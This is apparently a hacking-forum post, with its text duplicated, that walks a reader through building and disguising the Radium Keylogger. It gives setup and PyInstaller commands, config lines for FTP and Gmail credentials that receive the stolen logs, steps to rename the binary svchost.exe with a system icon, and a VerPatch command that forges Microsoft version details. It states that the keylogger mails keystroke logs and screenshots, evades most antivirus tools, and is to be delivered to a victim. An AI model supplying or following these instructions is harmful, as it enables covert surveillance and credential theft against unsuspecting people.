Hacker
Professional
- Messages
- 1,043
- Reaction score
- 844
- Points
- 113
What will we need?
1. Google the name "Radium Keylogger" and download everything from the github, unpack it into a random folder.
2. Google "Python2. 7 download for free without sms in high quality" download and install with the default parameters, the only thing I would like to say is that you need to select ALL the components to install in the component selection window for installation, respectively.
Otherwise, you will have problems, I will not describe the details.
3. We also download and install everything from there, from the Radium Keylogger page on the github from the Requirements section (pyHook; PyWin32; Microsoft Visual C++ Compiler for Python), except for PyInstaller. We'll use the handles to set it in the next step.
4. Open PowerShell as an administrator. Next, go to the folder with the unpacked source files using the command
Then we execute the command
We will also install the recommended packages next
5. Opening the source code Radiumkeylogger.py in your favorite text editor, you can even use it in Word.
Looking for strings
From the name it is not difficult to guess what for what. But I'll tell you what needs to be done.
We replace the values of the form base64. b64decode("") with just stupidly "your value". If you are not too lazy, you can convert your data to base64 using any online converter and put the value in quotation marks between parentheses.
6. Let's go through the source code and fix it for order and disguise wherever it is mentioned "AdobePush.exe" на "svchost.exe". We will also replace "Radiumkeylogger.py" and "AdobePush.py" on svchost.exe to ensure that the autoload is working properly.
7. We compile everything into an executable file, in the same PowerShell
Executing the command
If you did everything correctly, a couple of folders will appear in the source folder. The dist will contain your long-awaited keylogger. This miracle weighs 9100Kb. Which is very sad for malware I have to say, but it can't be helped, I didn't bother because not for myself. Moreover, the standard svchost sometimes burns out 50Mb and if it weighs 20Kb may cause suspicion in an experienced user.
8. This is not all, you can mess with the package and the crypt yourself, we will immediately make a basic disguise. Download and install the VerPatch and VerPatch и Resource Hacker. For your convenience, I chose the most publicly accessible one.
9. Rename the resulting file to svchost.exe. Using Resource Hacker Library /Windows/system32/imageres.dll and we save all its resources in any folder, I think you can understand the functionality of this program.
Next, open our keylogger and replace its icon with 15. ico is a standard icon for applications that do not have resources inside, and the main Windows system processes are displayed with the same icon. Save and exit.
10. Copy our file to the folder with the unpacked VerPatch. Open the command prompt and go to this folder.
Executing the command
If the system has a Russian locale, replace "Host Process for Windows Services" with the Host Process for Windows services or whatever the hell it is.
After that, our keylogger will only be saved by running on behalf of the user. However, this problem can be easily solved by Googling for a couple of minutes.
11. Everything. You can start and check your email. After starting, you should receive an email notification that everything is OK.
I would like to warn you that logs are sent by default after typing 300 characters screenshots after typing 500 characters, screenshots are packed in 10 pieces and sent to the mail as logs. Naturally, after digging with the handles in the source code, all values can be replaced to meet your requirements.
As you can see, it is not detected by the main antivirus programs only by some very exotic ones. All you have to do is decide whether to deliver it to the victim's car.
1. Google the name "Radium Keylogger" and download everything from the github, unpack it into a random folder.
2. Google "Python2. 7 download for free without sms in high quality" download and install with the default parameters, the only thing I would like to say is that you need to select ALL the components to install in the component selection window for installation, respectively.
Otherwise, you will have problems, I will not describe the details.
3. We also download and install everything from there, from the Radium Keylogger page on the github from the Requirements section (pyHook; PyWin32; Microsoft Visual C++ Compiler for Python), except for PyInstaller. We'll use the handles to set it in the next step.
4. Open PowerShell as an administrator. Next, go to the folder with the unpacked source files using the command
Code:
cd With: \ full\path\to \ sourcesThen we execute the command
Code:
pip install pyinstallerWe will also install the recommended packages next
Code:
pip install -r .\requirements.txt5. Opening the source code Radiumkeylogger.py in your favorite text editor, you can even use it in Word.
Looking for strings
Code:
ip = base64. b64decode ("") #IP to connect to FTP server address or domain of the FTP server.
ftpkey = base64. b64decode ("") #FTP password Password from the FTP server.
ftpuser = base64. b64decode ("") #FTP username Name of the FTP server user.
passkey = base64. b64decode ("") #Password to connect to GMAIL smtp server.
userkey = base64. b64decode ("") #Username to connect to GMAIL smtp server Username.From the name it is not difficult to guess what for what. But I'll tell you what needs to be done.
We replace the values of the form base64. b64decode("") with just stupidly "your value". If you are not too lazy, you can convert your data to base64 using any online converter and put the value in quotation marks between parentheses.
6. Let's go through the source code and fix it for order and disguise wherever it is mentioned "AdobePush.exe" на "svchost.exe". We will also replace "Radiumkeylogger.py" and "AdobePush.py" on svchost.exe to ensure that the autoload is working properly.
7. We compile everything into an executable file, in the same PowerShell
Executing the command
Code:
pyinstaller -onefile -windowedRadiumkeylogger.pyIf you did everything correctly, a couple of folders will appear in the source folder. The dist will contain your long-awaited keylogger. This miracle weighs 9100Kb. Which is very sad for malware I have to say, but it can't be helped, I didn't bother because not for myself. Moreover, the standard svchost sometimes burns out 50Mb and if it weighs 20Kb may cause suspicion in an experienced user.
8. This is not all, you can mess with the package and the crypt yourself, we will immediately make a basic disguise. Download and install the VerPatch and VerPatch и Resource Hacker. For your convenience, I chose the most publicly accessible one.
9. Rename the resulting file to svchost.exe. Using Resource Hacker Library /Windows/system32/imageres.dll and we save all its resources in any folder, I think you can understand the functionality of this program.
Next, open our keylogger and replace its icon with 15. ico is a standard icon for applications that do not have resources inside, and the main Windows system processes are displayed with the same icon. Save and exit.
10. Copy our file to the folder with the unpacked VerPatch. Open the command prompt and go to this folder.
Executing the command
Code:
verpatch svchost.exe 6.3.9600.0 /va /s description "Host Process for Windows Services" /s product "Microsoft Windows"If the system has a Russian locale, replace "Host Process for Windows Services" with the Host Process for Windows services or whatever the hell it is.
After that, our keylogger will only be saved by running on behalf of the user. However, this problem can be easily solved by Googling for a couple of minutes.
11. Everything. You can start and check your email. After starting, you should receive an email notification that everything is OK.
I would like to warn you that logs are sent by default after typing 300 characters screenshots after typing 500 characters, screenshots are packed in 10 pieces and sent to the mail as logs. Naturally, after digging with the handles in the source code, all values can be replaced to meet your requirements.
As you can see, it is not detected by the main antivirus programs only by some very exotic ones. All you have to do is decide whether to deliver it to the victim's car.
